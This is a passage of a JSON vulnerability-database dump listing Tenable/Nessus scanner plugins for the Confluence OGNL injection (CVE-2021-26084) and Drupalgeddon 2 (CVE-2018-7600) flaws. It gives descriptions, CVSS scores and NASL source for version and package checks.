It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112961", "href": "https://www.tenable.com/plugins/was/112961", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T22:22:59", "description": "The remote Atlassian Confluence application running on the remote host is affected by an OGNL injection vulnerability that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance by sending a specially crafted HTTP request.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-07T00:00:00", "type": "nessus", "title": "Atlassian Confluence Server Webwork OGNL Injection (CVE-2021-26084)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2021_26084.NBIN", "href": "https://www.tenable.com/plugins/nessus/153087", "sourceData": "Binary data confluence_cve_2021_26084.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:20", "description": "According to its self-reported version number, the Atlassian Confluence application running on the 
remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.12.x < 7.12.5 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112964", "href": "https://www.tenable.com/plugins/was/112964", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:59:03", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.1.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98568", "href": "https://www.tenable.com/plugins/was/98568", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:59:09", "description": "According to its 
self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.4.x < 8.4.6 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98565", "href": "https://www.tenable.com/plugins/was/98565", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-15T14:24:05", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.\n\nNote: This has been detected using an active check and should be remediated immediately.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-22T00:00:00", "type": "nessus", "title": "Drupal < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-09-07T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_98216", "href": "https://www.tenable.com/plugins/was/98216", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:33", "description": "The version of Drupal installed on the remote server is 8.x prior to 8.3.9, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as 
certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.x < 8.3.9 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700228.PRM", "href": "https://www.tenable.com/plugins/nnm/700228", "sourceData": "Binary data 700228.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:34", "description": "The version of Drupal installed on the remote server is 7.x prior to 7.58, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. 
This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700224.PRM", "href": "https://www.tenable.com/plugins/nnm/700224", "sourceData": "Binary data 700224.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:34", "description": "The version of Drupal installed on the remote server is 8.5.x prior to 8.5.1, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.5.x < 8.5.1 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700230.PRM", "href": "https://www.tenable.com/plugins/nnm/700230", "sourceData": "Binary data 700230.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:34", "description": "The version of Drupal installed on the remote server is 8.4.x prior to 8.4.6, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. 
This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.4.x < 8.4.6 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700229.PRM", "href": "https://www.tenable.com/plugins/nnm/700229", "sourceData": "Binary data 700229.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-15T14:35:13", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.3.x < 8.3.9 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98566", "href": "https://www.tenable.com/plugins/was/98566", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-15T14:35:06", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 Remote Code Execution Vulnerability", 
"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98570", "href": "https://www.tenable.com/plugins/was/98570", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:59:20", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.0.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98569", "href": "https://www.tenable.com/plugins/was/98569", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-15T14:34:49", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.5.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98564", "href": 
"https://www.tenable.com/plugins/was/98564", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:59:19", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.2.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98567", "href": "https://www.tenable.com/plugins/was/98567", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:14:36", "description": "According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9, 8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. 
It is, therefore, affected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-28T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_8_5_1.NASL", "href": "https://www.tenable.com/plugins/nessus/108688", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108688);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9,\n8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. 
It is, therefore,\naffected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.58 / 8.3.9 / 8.4.6 / 8.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7600\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2018/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:\"Drupal\", port:port, webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"7.0\", \"max_version\" : \"7.57\", \"fixed_version\" : \"7.58\" },\n { \"min_version\" : \"8.3.0\", \"max_version\" : \"8.3.8\", \"fixed_version\" : \"8.3.9\" },\n { \"min_version\" : \"8.4.0\", \"max_version\" : \"8.4.5\", \"fixed_version\" : \"8.4.6\" },\n { \"min_version\" : \"8.5.0\", \"max_version\" : \"8.5.0\", \"fixed_version\" : \"8.5.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:16:28", "description": "Jasper Mattsson found a remote code execution vulnerability in the Drupal content management system. 
This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.\n\nFor further information please refer to the official upstream advisory at https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1325.NASL", "href": "https://www.tenable.com/plugins/nessus/108695", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1325-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108695);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result\nin the site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:17:20", "description": "A remote code execution vulnerability has been found in Drupal, a fully-featured content management framework. 
For additional information, please refer to the upstream advisory at https://www.drupal.org/sa-core-2018-002", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4156.NASL", "href": "https://www.tenable.com/plugins/nessus/108698", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4156. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108698);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"DSA\", value:\"4156\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. 
For additional\ninformation, please refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4156\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the drupal7 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API 
